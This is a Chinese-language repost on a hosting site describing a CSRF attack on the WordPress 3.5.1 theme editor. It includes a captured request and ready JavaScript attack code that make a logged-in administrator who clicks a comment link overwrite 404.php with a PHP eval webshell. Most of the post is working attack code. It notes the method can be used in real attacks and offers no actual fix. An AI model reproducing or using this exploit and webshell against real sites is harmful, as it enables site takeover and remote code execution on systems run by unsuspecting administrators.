鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

wordpress后台CSRF不严,管理员访问某些链接可拿shell

来源:互联网 作者:佚名 时间:2015-10-19 08:40
wordpress3.5.1后台修改主题模版处防CSRF不严,前台评论可加入超链接,可写上诱惑性东西 骗取管理员点击后写入一句话木马 进入后台-外观-编辑。选择编辑Twenty Twelve主题下的404.php文件。将原内容去掉,换成一句话木马,同时打开抓包工具。 更新后抓到包 p

wordpress3.5.1后台修改主题模版处防CSRF不严,前台评论可加入超链接,可写上诱惑性东西 骗取管理员点击后写入一句话木马
进入后台-外观-编辑。选择编辑Twenty Twelve主题下的404.php文件。将原内容去掉,换成一句话木马,同时打开抓包工具。



更新后抓到包


 

post http://localhost/wp/wp-admin/theme-editor.php
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve
Cookie: wordpress_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7Cb875aa22d9bb88383aa6f9b1628dd86b; wp-settings-time-1=1364445495; comment_author_1233097993469c07c80a9cb529880b71=test; comment_author_email_1233097993469c07c80a9cb529880b71=632117384%40qq.com; wp-settings-1=editor%3Dhtml; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7C082956c79c01926f6f107ccd131dade7; s5wJ_2132_saltkey=uNFgCP80; s5wJ_2132_lastvisit=1364366389; s5wJ_2132_ulastactivity=591affdyS6zMRtF88Jad%2BTVr47oX95MIizEQOFn8RMF%2BN%2FpUUHdw
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 268
_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=%3C%3Fphp+eval%28%24_GET%5Ba%5D%29%3B%3F%3E&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6

 

由于本地演示,用AJAX进行CSRF攻击。

编写localhost/wp.html文件。内容为


 

<script>
function CreateRquest(){
var httpRequest;
try{
httpRequest=new ActiveXObject("Msxml2.XMLHTTP");
}catch(e){
try{
httpRequest=new ActiveXObject("Microsoft.XMLHTTP");
}catch(e1){
httpRequest=new XMLHttpRequest();
}
}
return httpRequest;
}
var request=CreateRquest();
request.open("post","http://localhost/wp/wp-admin/theme-editor.php",true);
request.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
var a="_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=<?php eval($_GET[a]);?>&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6";
request.send(a);
</script>

 

将被修改的404.PHP恢复,并且在前台评论写入<a href="http://localhost/wp.html">管理员,有一篇文章也讲到了这个问题

管理员登录后台查看评论。点击链接后

Twenty Twelve主题下的404.php已被成功修改为一句话木马



访问一句话木马


 



攻击成功,AJAX仅为演示,实战中可用JS控制表单自动提交来实现跨域传输数据。

修复方案:

你们比我懂

网友评论
<